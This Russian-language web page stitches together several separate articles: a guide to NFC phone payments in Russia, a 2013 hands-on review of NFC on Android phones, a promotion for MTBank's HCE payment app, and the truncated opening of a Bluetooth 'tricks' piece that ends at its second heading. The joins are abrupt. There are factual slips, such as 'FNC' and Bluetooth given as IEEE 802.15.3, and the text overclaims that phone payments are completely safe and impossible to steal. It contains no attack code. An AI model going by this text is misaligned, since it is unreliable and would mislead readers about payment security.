Еще пару лет назад сотовый был лишь аппаратом для звонков и смс, но времена меняются, и сегодня при помощи мобильного можно серфить по интернету, слушать музыку, передавать файлы по электронной почте, делать фотографии и много другого. Идя в магазин, сейчас тоже можно брать смартфон, ведь благодаря мобильному приложению стало легко осуществлять оплату телефоном вместо карты или налички.

Что такое бесконтактная оплата телефоном

Для того чтобы понять как происходит процесс оплаты, стоит разобраться в бесконтактных технологиях. Платежная карточка – кусок пластика с вшитым туда микропроцессором. Банковские учреждения закупают заготовки у производителя и записывают информацию на чип. У мобильника тоже присутствует чип, поэтому на него можно записать платежные данные клиента. Значит, сотовый сам по себе может быть платежным средством, таким же, как и бесконтактная кредитная карточка. Возможно это благодаря использованию системы NFC, которая является чем-то сродни Wi-Fi и Bluetooth.

Технология NFC

Для обмена информацией между платежным терминалом и смартфоном используется Near field communication, сокращенно NFC – технология ближней связи. Она помогает обмениваться информацией на небольшом расстоянии, равном приблизительно 4 см. Отличительной особенностью технологии NFC заключается в том, что нет необходимости каждый раз вводить пароли и логины. Нужно лишь приложить приборы друг к другу и оплата телефоном вместо карты будет совершена. Такая технология используется при производстве транспортных карт.

Какие банки поддерживают NFC

Одним из первых банковских учреждений, который внедрил оплату сотовым вместо карточки для клиентов, был Сбербанк, поскольку львиная доля пользователей кредиток приходится на его долю. Следующим, кто ввел в действие возможность использования NFC, был Альфа-банк. Работали, правда, они с системами Samsung Pay и Apple Pay. После же выхода приложения для Android, запустили сервис по платежам гаджетом и другие банки:

• ВТБ24;
• Ак Барс;
• Бинбанк
• Открытие;
• Рокетбанк;
• Точка;
• МТС-Банк;
• Промсвязьбанк;
• Райффайзенбанк;
• Россельхозбанк;
• Русский стандарт;
• Тинькофф.

Платежная функция телефона

Для возможности оплаты телефоном вместо карты там должен присутствовать NFC-чип. У старых моделей кроме этого должен находиться микропроцессор Secure Element, куда записываются данные платежного приложения. Чип может быть встроен в материнскую плату или находится на симке или карте памяти. Благодаря внедрению в новые телефоны функции Host Card Emulation (HCE), данные о пластиковых картах могут храниться непосредственно в самом приложении.

В каких моделях смартфонов есть предустановленная версия

Если ранее предустановленная версия программы, при помощи которой возможна оплата телефоном вместо карты, находилась лишь в некоторых моделях, то на настоящем этапе владельцы любых смартфонов, имеющие функцию FNC, могут спокойно оставлять свой кошелек дома. Для походов по магазинам, рестораны, кафе надо лишь взять с собой сотовый, правда обязательно нужно обратить внимание, установлен ли в точке торговли терминал, принимающий бесконтактную оплату.

Приложения для оплаты через NFC

Перед тем как оплатить телефоном вместо карточки, необходимо установит специальное приложение, которое поможет привязать кредитку к мобильному. На сегодняшний день их несколько, поэтому выбрать есть из чего:

• Яндекс.Деньги. Приложение устанавливается на гаджет, после чего надо зайти в меню и выбрать раздел «Бесконтактные платежи». Пользователю будет доступна виртуальная карта MasterCard, а на телефон поступит pin-код, который будет необходим для оплаты товаров и услуг стоимостью выше 1000 рублей или снятия наличности в банкоматах.
• Visa QIWI Wallet. Для начала необходимо скачать приложение на телефон и привязать его к смартфону. Для того понадобится код, который будет отправлен пользователю по смс. После этого владелец должен придумать пароль, который защитит платежную систему. Для оплаты понадобится лишь разблокировать экран телефона, а при покупке на сумму более 1000 рублей поставить подпись на чеке или даже ввести код.
• Кошелек. Банковские карты. Устанавливается на смартфон из Google Play и работает на гаджетах с Android 4.4 и выше.
• Samsung Pay. Приложение, устанавливается на телефонах компании. Помимо того, что возможна оплата по NFC, пользователи получили в придачу и MST (Magnetic Secure Transmission). Если первая работает только с терминалами, принимающими бесконтактную оплату, то вторая со всеми, через которые можно расплатиться карточками с магнитной полосой, поскольку в своей работе создает «схожий сигнал».
• Apple Pay. Сервис, интегрированный в приложение Wallet, дает всем пользователям гаджетов, выпущенных компании Apple, использовать их при расчетах через терминалы бесконтактной оплаты и онлайн в некоторых интернет-магазинах.

Как настроить NFC для оплаты картой

Для пользователей телефонов на операционной системе Андроид для включения функции NFC нужно войти в меню и выбрать раздел «Беспроводные сети». Там необходимо выбрать подкатегорию «NFC» и активировать модуль. В этом случае автоматически активируется функция Android Beam, ускоряющая работу приложения. Если этого не произошло – нужно самостоятельно активировать ее. Для владельцев виндовсфонов в разделе «Настройки» необходимо выбрать категорию «Устройства», где активировать функцию NFC.

Загрузка карты в телефон

Не составит труда привязать карту к выбранному приложению, поскольку уже при идентификации пользователю предложат внести данные. Стоит учитывать что некоторые приложения, такие, например, как Яндекс.Деньги выпускают и предлагают воспользоваться собственной виртуальной карточкой. Подводя итог, можно сказать, что NFC-оплата телефоном возможна с уже имеющейся кредиткой MasterCard PayPass или VISA PayWave, так и виртуальной, которая выпускается после установки приложения.

Управление картами

Приложения позволяют пользователям смартфонов IPhone, Samsung, HTC, LG и прочих привязывать разные карты. При необходимости можно удалить данные старой кредитки и внести новые. Для владельцев Айфона по умолчанию платежной является первая введенная кредитка. Если были введены другие карты, тогда в приложении необходимо указать ту, которая является приоритетной.

Приложение CardsMobile «Кошелек»

В 2015 году в России вышло приложение «Кошелек» («Облачная» бета-версия приложения называется «Кошелёк. Банковские карты»), встраиваемое первоначально в некоторые модели смартфонов. Сейчас его можно скачать с Google Play абсолютно бесплатно и пользоваться на мобильных с операционной системой Android версии 4.4 и выше. После регистрации необходимо выбрать одну из карт предложенных учреждений и заполнить определенные данные. Владелец телефона может воспользоваться условий предоплаченных кредиток банков Тинькофф, Русский Стандарт, Санкт-Петербург.

Оплата смартфоном как картой

В один гаджет можно закачать сразу несколько карточек. Оплата картой через телефон полностью безопасна и происходит по защищенным каналам. Такую кредитку украсть невозможно, никто не видит ни пин-код, ни реквизиты. При использовании способа расчета касанием терминал использует не данные карточки, а лишь цифровой код, который безопасен даже при вероятности мошенничества, поскольку не несет никакой информации. Оплата телефоном вместо карты не требует подключения к интернету, что является преимущество при использовании его вместо кредитки за границей.

Где принимают бесконтактные платежи

Технология бесконтактной оплаты удобна. Телефон с НФС можно использовать в торговых объектах при оплате покупок. Им легко расплачиваться в ресторанах, за проезд на аэроэкспрессе и в кассах метрополитена. Заплатить за товары или услуги можно везде, где существует реальная возможность совершения операций по терминалам бесконтактной оплаты. Если активировано приложение Samsung Pay, возможность оплаты прикосновением телефона вместо кредитки возрастает, поскольку операцию можно совершить почти с любым терминалом не только в Москве, но и по всей стране, и даже за рубежом.

Как расплатиться телефоном в магазине

Перед тем как платить телефоном с NFC, необходимо запускать в нем этот самый модуль путем перехода в меню смартфона. Если программа потребует, то нужно активировать программу при помощи введенного ранее кода. Подойдя к терминалу следует включить экран и поднести смартфон к ридеру. Все транзакции до 1000 р. автоматически оплачиваются, все остальные потребуют введения платежного пароля или подтверждения операции подписью.

Пополнение карты

Оплата через NFC требует положительного баланса на карточке. По этой причине необходимо пополнить счет. Сделать это можно в самом приложении при помощи пластиковой карты других банков или же через специальные сервисы банковских учреждений. За безопасность процесса использования сотового вместо пластика ручаются международные платежные системы, а зачисление денежных средств происходит быстро – в течение нескольких минут.

Видео

Сочетание «NFC» (Near field communication — коммуникации ближнего поля) все чаще встречается в спецификациях современных смартфонов и планшетов. В этой статье мы постараемся рассмотреть этот интерфейс с точки зрения практического использования, так что читатели смогут самостоятельно сделать вывод о необходимости его наличия в своем телефоне.

В тестировании мы использовали две модели смартфонов, которые уже были подробно рассмотрены на нашем ресурсе: Acer CloudMobile S500 и Sony Xperia acro S . Также хотим обратить внимание, что большинство информации, включая описанные программы и сценарии использования, будет относиться только к смартфонам на базе Android. Именно эта операционная система сегодня наиболее «дружелюбна», когда дело касается работы с NFC.

Введение

На первый взгляд может показаться, что многочисленные беспроводные интерфейсы сегодня уже покрывают все возможные популярные задачи и сценарии, так что еще один вариант просто не нужен. Однако если посмотреть на развитие современных технологий, то можно заметить, что все больше внимания уделяется вопросам энергопотребления, особенно если речь идет о мобильных устройствах. В частности версия 4.0 известного семейства протоколов Bluetooth как раз ориентирована на снижение затрат заряда батареи. Второй момент, который стоит упомянуть, состоит в том, что не для каждой задачи требуется большая дальность работы. Бывает даже наоборот — хочется явно ограничить расстояние между взаимодействующими устройствами. Кроме очевидного снижения потребления, это также влияет и на безопасность. Да и про объемы передаваемых данных тоже можно сделать аналогичное замечание. Так что идея небыстрого беспроводного интерфейса, работающего на небольших расстояниях и отличающегося низким энергопотреблением вполне имеет право на существование.

За начальную точку отсчета в истории развития NFC можно принять 2004 год, когда Nokia, Philips и Sony объявили о создании с целью разработки и стандартизации интерфейса взаимодействия различных устройств, основанного на касании. Впрочем, первые версии спецификаций были созданы немного ранее. Пожалуй, по современным меркам технологию можно считать очень молодой (если не учитывать историю RFID), однако она уже достаточно часто встречается в реальных продуктах и сервисах. В частности, на прошедшем в конце февраля Mobile World Congress 2013 этой теме были посвящены многие стенды и демонстрации.

Такой знак можно встретить на устройствах с технологией NFC

Формальные характеристики интерфейса следующие: работа на расстоянии нескольких сантиметров, максимальная скорость обмена информацией около 400 Кбит/с, поддерживается полнодуплексный обмен данными, рабочая частота 13,56 МГц, время установления соединения не превышает 0,1 с, режим работы — точка-точка. Видно, что эти параметры кардинально отличают NFC от других популярных беспроводных интерфейсов.

Если говорить про устройства, то кроме активных контроллеров в NFC существуют и пассивные варианты (они обычно называются метками), которые получают питание беспроводным способом от активного контроллера. Одним из примеров являются современные карты для проезда на городском транспорте. Метки представляют собой просто хранилище данных, объем которого обычно не превышает 4 КБ. Чаще всего для них обеспечивается только режим чтения, но есть варианты и с поддержкой записи.

Один из простейших вариантов пассивной NFC-метки

Компактный размер контроллера и его низкое потребление позволяет реализовать NFC даже в таких небольших конструкциях, как SIM-карты или карты памяти microSD. Однако для полноценной работы необходимо использование специальной антенны. В телефонах она обычно находится на обратной стороне крышки батарейного отсека или же встроена в заднюю панель, если аппарат не предполагает съемной батареи.

Антенну NFC часто размещают на задней крышке смартфона

Небольшой радиус действия может негативно сказаться при использовании планшетов — найти нужное место для «прикладывания» может быть не так просто, как хотелось бы. Для решения этой проблемы некоторые производители помечают местонахождение антенны специальным знаком. Что касается дальности, то в нашем случае связь работала на расстоянии не более четырех сантиметров — как между телефонами, так и с пассивной меткой.

С точки зрения безопасности, разработчики не стали реализовывать элементы защиты от перехвата и атаки ретрансляции. Это конечно затрудняет реализацию безопасных решений, поскольку требует от самих приложений защиты на более высоком уровне. Отметим, что на самом деле аналогично ведет себя и такой известный протокол, как TCP/IP. Так что с практической точки зрения, более опасным представляется потеря телефона без дополнительной защиты с настроенными программами платежных систем, чем перехват коммуникаций.

Пожалуй, самое главное, что нужно сегодня знать о NFC, это то, что сам по себе интерфейс не дает никаких реальных практических сценариев использования или решений. В отличие, например, от Bluetooth, профили которого четко описывают, как передать файл, как подключить гарнитуру или обеспечить сетевой доступ, NFC является только базой, а непосредственные сценарии работы обеспечиваются дополнительным программным обеспечением, которое работает через него. С одной стороны, это открывает широкие возможности для разработчиков, а с другой — является для них же проблемой при обеспечении взаимодействия разных приложений и устройств.

Интересно, что любые установленные на смартфон или планшет программы могут зарегистрироваться в операционной системе как обработчики событий, связанных с NFC, и тогда при внешнем «вызове» вы увидите стандартное меню «чем вы хотите осуществить это действие?». Поскольку некоторые сценарии использования NFC подразумевают удобную автоматизацию действий, желательно не перегружать устройство такими утилитами.

Форум NFC старается помочь с этой неопределенностью, предлагая стандартизировать протоколы для определенных сценариев (в частности NDEF для хранения коротких сообщений на метках и SNEP (Simple NDEF Exchange Protocol) для обмена информацией между устройствами), однако практическое определение совместимости конкретных устройств обычно затруднено отсутствием детальной информации от производителя и средств диагностики. Еще одним помощником выступает здесь компания Google, которая предложила в последних версиях Android собственную разработку Android Beam. Она позволяет обмениваться некоторыми типами информации между совместимыми устройствами.

Android Beam

Для начала нужно убедиться, что оба устройства имеют включенный NFC, активный Android Beam, а их экраны разблокированы. На тех моделях, что мы тестировали, NFC работает только в том случае, если включен экран и устройство полностью разблокировано. Но возможно, в других аппаратах будет использован и другой алгоритм. В любом случае, активный интерфейс требует для работы совсем немного энергии батареи, и пока описанный подход выглядит вполне разумно. Один из вариантов упрощения работы — отключение экрана блокировки. В этом случае для опознавания метки будет достаточно просто включить смартфон. Другим неудобством является необходимость подтверждения операции касанием экрана после того, как устройства найдут друг друга. Это не всегда просто сделать без нарушения связи, тем более когда оба устройства находятся на весу в руках у двух разных людей.

Следующим шагом надо выбрать одно из приложений на аппарате, с которого планируется передача. В частности это могут быть:

• Google Chrome — передача текущей открытой ссылки;
• Клиент YouTube — передача видеоклипа (в виде ссылки);
• Google Maps — передача места или маршрута;
• Контакты — передача карточки контакта;
• Google Play — передача приложения;
• Галерея — передача фотографий.

Далее приближаете устройства друг к другу. При обнаружении партнера вы услышите сигнал на устройстве-отправителе, и изображение на рабочем столе уменьшится. В этот момент нужно коснуться экранной картинки и держать палец, пока не услышите второй сигнал — об успешной передаче.

Мы попробовали указанные в списке варианты, и практически все они действительно работают. Даже то, что наши устройства были выпущены разными производителями, не помешало им найти общий язык. Но несколько комментариев все-таки стоит сделать. С маршрутами в Google Maps проблем нет, а вариант с местом не очень интересен, т. к. передается только текущее отображение карты. Точка же, отмеченная на экране исходного телефона, к получателю не попадает. Ситуация исправляется использованием приложения «Адреса», которое передает данные корректно. При отправке контактов теряется фотография, поскольку с технической точки зрения формат передачи соответствует текстовым файлам vcf. Если говорить про приложения, то отправить можно не только установленные на телефоне, но и просто открытые карточки в Google Play. Аналогично поддерживаются книги и другой контент из магазина. Естественно, речь идет о передаче ссылок, а не самих загруженных или тем более купленных элементов. С отправкой фотографий обнаружилась проблема: аппарат Sony оказался неспособен работать с данными такого типа. Официальная формулировка звучит как «Устройство получателя не поддерживает передачу больших объемов данных через Android Beam». Вот вам и первый признак молодости интерфейса или же недостаточной детализации технических спецификаций устройств. Формально мы имеем в двух аппаратах и NFC, и Android Beam, а на практике их реальные возможности существенно отличаются, и узнать об этом можно только в результате проверки. Что уж говорить про менее именитых производителей — их вариант реализации данной технологии может быть совсем непредсказуемым.

Кстати, что касается самой работы Android Beam. В описании технологии указывается, что для передачи данных используется установление связи по Bluetooth после первоначального согласования настроек по NFC. Учитывая, что все работающие форматы предполагали действительно небольшой объем передаваемых данных, для них вполне хватало и скорости NFC, а вот для фотографий его было бы явно мало. Так что можно предположить, что в Sony как раз и не реализовано переключение на более скоростной интерфейс. Понять, является ли эта проблема программной (напомним, что на этом устройстве установлен Android 4.0.4) или аппаратной, не представляется возможным.

Мы попытались также отправить собственную музыку и видео аналогичным образом из соответствующих приложений, но на приемнике ничего не появлялось.

Чтение и запись меток

Описанный Android Beam использует возможность передачи и обработки коротких информационных сообщений. Однако в реальности их можно не только передавать с телефона, но и считывать с пассивных меток. В некотором смысле эта технология аналогична известным QR-кодам, которые считываются фотокамерой телефона. При этом полезная информация (например, ссылка на страницу сайта) занимает буквально несколько десятков байт. Метки могут использоваться компаниями, например, для продвижения своих товаров или услуг. Учитывая компактный размер пассивной метки (точнее, сравнимую с листом бумаги толщину — из-за антенны площадь будет все-таки значительной, не менее пятирублевой монеты), она может быть размещена практически в любом месте: на коробке с товаром, в журнале, на информационной стойке и других местах.

Пассивные метки NFC могут быть изготовлены в виде брелков

Если же говорить про собственноручное изготовление меток, то и это вполне осуществимый сценарий. Для этого нужно приобрести чистые заготовки и с использованием специальной программы для телефона записать на них требуемую информацию. Для примера мы купили несколько разных вариантов: наклейку минимальной толщины, защищенный кружочек из пластика и брелки. Все они имели совсем небольшой объем памяти — всего 144 байта (на рынке присутствуют варианты и на 4 КБ). Число циклов перезаписи указано не было, но для большинства сценариев применения этот параметр не критичен. Для работы с метками можно рекомендовать программы NXP Semiconductors — TagInfo и TagWriter.

Первая позволит вам считать данные с метки и расшифровать информацию по стандарту NDEF, а вторая поможет создать собственные метки. При этом поддерживаются несколько подвариантов NDEF: контакт, ссылка, текст, SMS, почтовое сообщение, телефонный номер, соединение по Bluetooth, географическое расположение, ссылка на локальный файл, запуск приложения, URI. Обратите внимание, что при создании записи нужно учитывать объем хранимых данных. Например, фотография контакта может занимать несколько килобайт, сообщения или текст также легко могут выйти за 144 байта. Кстати, программа NFC TagInfo компании NFC Research Lab со специальным плагином может прочитать и показать вам цветную фотографию из биометрического паспорта. При объеме данных в полтора десятка килобайт их чтение по NFC занимает около 20 секунд. Дополнительный уровень защиты в данном случае обеспечивается необходимостью указания некоторых реквизитов паспорта для чтения данных из чипа.

Отметим, что автоматическая обработка считанных меток зависит от контента. В частности, иногда требуются дополнительные подтверждение для осуществления самого действия. Например, в случае SMS открывается заполненная форма сообщения, но собственно отправку должен подтвердить пользователь. А вот записанная web-ссылка может сразу открываться в браузере. Любая автоматизация связана с потерей контроля, так что и описанные возможности стоит применять осторожно, поскольку простой заменой или перепрограммированием меток злоумышленники могут перенаправить вас на подставной сайт вместо оригинального. Штатных настроек ОС для ограничения подобного автозапуска мы не обнаружили (если только не отключить сам NFC).

Еще один важный момент при использовании меток в публичных местах — защита от перезаписи. При записи метки вы можете поставить флаг защиты, который будет блокировать все попытки изменения информации, но снять его будет уже невозможно. Так что метка будет в дальнейшем использоваться в режиме «только для чтения». Для домашнего применения это в большинстве случаев не очень критично.

Упомянем еще несколько программ для записи меток:

Использование готовых меток для управления устройством

Одним из активных участников процесса внедрения NFC является компания Sony. В ее аппаратах предустановленна программа Smart Connect, поддерживающая работу с оригинальными метками Sony. При желании с использованием утилиты SmartTag Maker вы можете создать их самостоятельно из чистых заготовок. Для работы системы используется формат NDEF URI с кодированием номера/цвета метки в текстовой ссылке. Всего система предусматривает до восьми меток, которые обозначены как «дом», «офис», «машина», «спальня», «слушать», «играть», «активности», «смотреть».

Вариант оригинальных меток Sony SmartTags

Сама программа Smart Connect работает не только с NFC-метками, но и с другими подключаемыми к телефону устройствами, включая гарнитуры, блок питания, устройства Bluetooth. Достаточно удобно, что штатные настройки уже неплохо соответствуют указанным выше сценариям. При этом пользователь может перепрограммировать все схемы; в каждой из них указывается набор из условия и действий.

В качестве условия можно использовать опознание метки или подключение устройства, дополнительно можно ограничить время работы схемы. Набор действий достаточно широкий, в него входят запуск приложения, открытие ссылки в браузере, запуск музыки, регулировка громкости и режима, подключение аудиоустройства Bluetooth, отправка SMS, звонок, управление беспроводными интерфейсами, регулировка яркости и другие действия. Причем их же можно назначить и на выход из данного режима, который осуществляется по повторному опознаванию метки, по новому событию/метке или по истечению указанного временно́го интервала.

Но на самом деле не обязательно использовать фирменные метки Sony — можно найти применение и готовым меткам, не допускающим перезаписи информации. Например, это могут быть использованные транспортные карты. Дело в том, что каждая из них имеет собственный уникальный идентификатор, который можно привязать к определенным действиям специальными программами. В качестве возможной реакции могут выступать такие операции, как изменение профиля, включение/выключение интерфейсов и множество других.

В магазине Play Store есть несколько утилит для этого сценария, упомянем пару из них:

Напомним, что не стоит устанавливать сразу несколько подобных программ. Удобства от такого режима не добавится, поскольку при обнаружении метки на экране телефона будет возникать диалоговое окно с выбором программы для ее обработки.

Во время поиска программ для работы с метками мы также встретились с еще одним классом утилит, которые могут быть интересны в случае наличия записываемых меток. Эти программы используют собственный оригинальный формат записей, работать с которым могут только они сами. При этом набор возможных действий почти не отличается от описанных выше:

Напомним, что в настоящий момент чтение метки осуществляется только при разблокированном аппарате. Так что сценарий «пришел домой, положил телефон на тумбочку — автоматически переключил профиль, отключил звонок и Bluetooth, настроил будильник» потребует от пользователя некоторых действий. Такое поведение все-таки немного ограничивает возможности программ.

Обмен информацией между устройствами

За исключением Android Beam описанные выше сценарии предполагают работу одного телефона с меткой или специализированным терминалом. Если же говорить про прямую связь аппаратов между собой, то основной вопрос здесь — совместимость. Конечно, в случае продуктов одного производителя, особенно крупного, у того есть возможность просто установить в прошивку соответствующую программу. Но если аппараты выпущены разными производителями, придется всем использовать одинаковые утилиты. И совсем не факт, что у вашего партнера будет установлена такая же программа, как у вас.

Учитывая, что собственная скорость NFC очень мала, для быстрой передачи файлов обычно используется Bluetooth или Wi-Fi, а NFC работает только на этапе согласования параметров подключения и установления связи. Для проверки этого сценария мы попробовали на наших устройствах несколько программ для передачи файлов с заявленной поддержкой NFC.

Send! File Transfer (NFC) в бесплатной версии позволяет обмениваться файлами фотографий, музыки и видео. Для установления связи можно использовать NFC или QR-коды. Передача осуществляется через Bluetooth или Wi-Fi (в случае, если оба устройства имеют поддержку Wi-Fi Direct , которой в использовавшемся телефоне Sony не оказалось). В итоге нам удалось увидеть скорость на уровне 65 КБ/с, что, конечно, слишком мало даже для фотографий.

Blue NFC, как понятно из названия, также упрощает обмен файлами по Bluetooth, заменяя этапы включения, поиска и сопряжения на касание с обменом информацией по NFC. Скорость работы не очень велика — на уровне упомянутой выше программы.

File Expert HD также использует Bluetooth, но скорость составляет уже 100-200 КБ/с. Правда, справедливости ради стоит заметить, что в этой программе есть и много других режимов обмена файлами.

Заключение

По состоянию на весну 2013 года можно сказать, что технология NFC уже уверенно занимает место в современных смартфонах топового и среднего уровня. Косвенно интерес к ней можно оценить по количеству программ в Play Store: одних только бесплатных проектов есть уже несколько сотен. Учитывая доминирование на рынке (особенно по числу моделей) платформы Android, именно она является сегодня наиболее популярной для NFC-устройств. В iOS штатных средств для NFC не предусмотрено, а Windows Phone 8 имеет существенно ограниченные возможности работы с NFC для сторонних приложений.

Сама по себе технология NFC имеет несколько особенностей, позволяющих ей занять уникальное положение:

• бесконтактная передача данных;
• работа только на небольших расстояниях;
• возможность обмена информацией с другими устройствами или пассивными метками;
• низкая стоимость решения;
• низкое энергопотребление;
• низкая скорость передачи данных.

В настоящий момент для смартфонов и планшетов можно отметить три наиболее актуальных варианта использования NFC: обмен данными между устройствами (контакты, приложения, ссылки, фотографии и другие файлы), чтение меток со специальной информацией и изменение режимов/настроек/профилей устройства, быстрое сопряжение с периферийными устройствами (например, гарнитурами). В первом случае можно попробовать работать со стандартной программой Android Beam или установить альтернативные варианты. Они могут быть полезны при необходимости высокой скорости обмена (по Wi-Fi), но требуют наличия одинаковой программы на каждом устройстве.

Пассивные метки могут использоваться практически везде — от плакатов до журналов и бирок на товарах. В них можно записать информацию о продукте, ссылку на сайт, настройки Wi-Fi, контактные данные, географические координаты или другой небольшой объем данных. Распространение такого способа обмена информацией напрямую зависит от числа совместимых устройств у пользователей. Этот сценарий можно сравнить с распространенными кодами QR, которые сегодня, пожалуй, все-таки проще с точки зрения реализации и более популярны.

Для изменения системных настроек можно использовать с некоторыми программами даже метки без возможности записи, так что попробовать в деле такой сценарий смогут многие пользователи. Правда, надо отметить, что в таком случае набор опций будет записан в конкретном устройстве, и с переносом его на другой аппарат могут быть сложности. Большинство утилит подобного назначения все-таки требуют собственных записанных меток, что позволяет им хранить всю требуемую информацию в закодированном виде непосредственно в метке (или облаке), так что для использования данных настроек на другом аппарате достаточно будет иметь на нем такую же программу.

Мы не рассматривали в этой статье такие сценарии использования NFC, как платежные системы, электронные кошельки и микроплатежи, билеты и купоны, транспортные карты и пропуска. Эти темы, особенно первая, заслуживают отдельного рассмотрения. Мы постараемся вернуться к ним при наличии читательского интереса и распространении подобных решений.

Представьте: очередь в гипермаркете, на кассе так долго задерживаются покупатели — чаще всего платят наличными, набирают нужную сумму, подолгу ждут сдачу от кассира. Но вот подходит ваша очередь, и «легким движением руки» вы мгновенно оплачиваете покупку, всего лишь прикоснувшись к терминалу своим мобильным телефоном!

Смартфон всегда под рукой

Мобильные телефоны давно перестали быть только средством для звонков и передачи СМС: теперь это интернет, книги, музыка, карты и навигация, фото и почта и многое другое. Есть данные, что в среднем человек смотрит на экран своего смартфона 150 раз в день! Мы, скорее, забудем дома кошелек, чем телефон, который хранит в себе всю нужную нам информацию. Вполне понятно, что появились и технологии, с помощью которых телефон превращается в средство для безналичной оплаты не только в интернете, но и в обычном магазине. В частности, технология бесконтактной оплаты MasterCard, с которой пластик перестал быть единственным носителем банковской карты.

С инновациями MasterCard для клиентов МТБанка теперь доступна возможность загрузить банковскую карту в телефон. С начала февраля в Google Play можно бесплатно скачать приложение МТБанка — MTBank HCE (ЭйчСиИ) − первое в Беларуси мобильное приложение, с которым можно рассчитываться за товары и услуги одним прикосновением вашего NFC-смартфона к терминалу с бесконтактной технологией. Потому что карта теперь находится у вас в телефоне! Давайте разберемся, как всё работает.

Как банковская карта перемещается в смартфон

По сути, каждая современная платежная карта - это микропроцессор, помещенный в кусок пластика. Банки закупают «заготовки» карт и записывают на них свое приложение с «платежными данными» клиента. Вывод: пластик - это просто носитель информации, которым может быть, к примеру, смартфон. Ведь каждый аппарат имеет процессор, в тысячи раз более мощный, чем тот, что находится на пластиковой карте.

Для обмена данными между смартфоном и платежным терминалом используется технология ближней связи Near field communication (NFC), похожая на Bluetooth или WiFi.

Эта технология позволяет обмениваться данными устройствам на совсем маленьком расстоянии - около 4 см. Сегодня она внедряется в смартфоны и телевизоры уже при производстве.

Что делать, чтобы рассчитываться смартфоном в одно касание?

Бесплатно скачиваем приложение MTBank HCE в Google Play.

Важный момент: ваш мобильный должен работать на операционной системе Android версии 4.4. и выше, поддерживать функцию NFC (Near Field Communication — или обмен данными на коротком расстоянии) и технологию HCE.

1. Регистрируемся. Для этого нужно ввести номер и CVC2 вашей банковской карты МТБанка. Обратите внимание, что у карты должна быть активизирована функция СМС-оповещения, потому как в целях безопасности для регистрации вас попросят ввести код подтверждения, который придет в СМС.
2. Придумываем пароль. 5−8 символов, которые вам будет легко запомнить, но не слишком простую комбинацию — все же это тоже защита. С помощью этого пароля вы сможете управлять функциями мобильного приложения: сменить существующий мобильный ПИН-код, блокировать/разблокировать карту в приложении, выполнить удаление данных из приложения.
3. Создаем мобильный пин. Он нужен, чтобы подтверждать покупки, оплачиваемые с помощью карты в смартфоне. Настоятельная рекомендация — мобильный пин должен отличатся от ПИНа, привязанного к вашей основной пластиковой карте.
4. Активируем карту. На экране появится список ваших карт MasterCard в МТБанке, поддерживающих функциональность бесконтактной оплаты. Выбираем те, с которых хотим платить смартфоном, щелкаем на них для активации. Выбрать можно не только какую-то одну карту, но и несколько из имеющихся карт.
5. Включаем NFC в вашем смартфоне . Как только вы выберете из списка карт ту, с помощью которой хотите совершать операцию, приложение автоматически перенаправит Вас в настройки телефона, чтобы включить в вашем мобильном устройстве NFC модуль. При желании активировать NFC можно заранее, чтобы не тратить даже лишнюю секунду на кассе. ВСЕ! Теперь можно платить смартфоном!
6. Совершаем оплату . Момент истины! Тут все просто и интуитивно: выбираем из списка активированных карт, с которой в данный момент должны быть списаны средства, вводим мобильный пин и подносим смартфон к терминалу с бесконтактной технологией MasterCard.

Достоинства новой технологии

• С новым инновационным решением получить карту в смартфон быстро и удобно. Нет необходимости менять сим-карту: достаточно скачать приложение. Теперь можно спокойно оставить кошелек дома.
• Безопасно: в приложении MTBank HCE данные надежно защищены, а каждая транзакция требует ввода мобильного ПИН кода. Платить в одно касание смартфоном так же безопасно, как и банковской картой, но при этом вы полностью контролируете процесс оплаты, так как не нужно передавать платежный инструмент кассиру.
• Большинство современных смартфонов поддерживают HCE. Поддержка есть в аппаратах с Android 4.4 и выше, нужными возможностями обладают такие популярные сегодня модели телефонов, как Samsung Galaxy S4(S5), Sony Xperia, HTC One, LG G4, Nexus 5 и многие другие.
• В режиме реального времени вы видите все совершенные с помощью приложения операции покупки. Очень полезно для планирования семейного бюджета.
• С мобильной картой MasterCard вы можете спокойно путешествовать и оплачивать покупки в Беларуси и других странах − более 4 миллионов торговых площадок в 72 странах принимают бесконтактную оплату MasterCard.
• Технология бесконтактной оплаты активно распространяется в Беларуси и во всем мире. К 2020 году поддержка бесконтактной оплаты станет стандартом MasterCard для европейских сервисных и торговых предприятий, потребители получат возможность расплачиваться бесконтактными картами и устройствами на всех POS-терминалах в Европе.

Любителям инноваций точно стоит протестировать новое приложение

Все отлично знают, что с помощью Bluetooth можно передать файл с девайса на девайс или подключить беспроводную гарнитуру. Но этим его возможности не ограничиваются. Имея при себе нужный инструмент, можно творить настоящие чудеса. Так почему бы не попробовать себя в роли фокусника?

Встроенный модуль технологии Bluetooth (или, если более официально, IEEE 802.15.3 ) давно перестал быть диковинкой. Стоимость модуля настолько мизерна, что не встраивает его в мобильный, ноутбук или КПК только ленивый производитель. Да и то – по соображениям маркетинга. Словом, Bluetooth используют практически все. Но лишь единицы знают, что, используя технологию, рискуют выдать свои конфиденциальные данные. Но начнем все-таки с хорошего!

Трюк 1: Используем BT для удаленного доступа к компьютеру

Как-то для проведения презентации я пригласил одну длинноногую подругу – нажимать кнопку «пробел», чтобы перелистывать слайды в Power Point. Это удовольствие стоило мне недешевого обеда и двух часов пустых разговоров с Barbie girl. После этого я твердо решил: в следующий раз проблему отсутствия пульта ДУ я обойду по-другому. И обошел, воспользовавшись мобильником! Да-да, прямо с телефона можно перелистывать слайды, управлять музыкой – и делать еще бог знает что. Главное, чтобы на мобильнике и компьютере были установлены BT-модули. Мало того, что сэкономишь деньги и силы, так еще и выглядеть будешь непростительно модно. Показать такой фокус способен каждый, кто заюзает утилиту
Bluetooth Remote Control , не столь давно обновившуюся до версии 3.0. Она позволяет управлять компьютером с экрана любого мобильного телефона. Все очень просто. На компьютер ставится специальная серверная часть, а на телефон – программа-клиент, написанная на Java (требуется MIDP 2.0). После настройки нехитрой схемы ты сможешь дистанционно управлять мышкой и клавиатурой компа. И самое главное – получишь доступ к удаленному рабочему столу. Настоящий Remote Desktop прямо с экрана мобильного телефона! Ну, а с длинноногой подругой время можно провести куда более удачно. Bluetooth Remote Control пригодится и здесь: чтобы поставить
романтическую музыку:).

Трюк 2: Контроль доступа с помощью BT

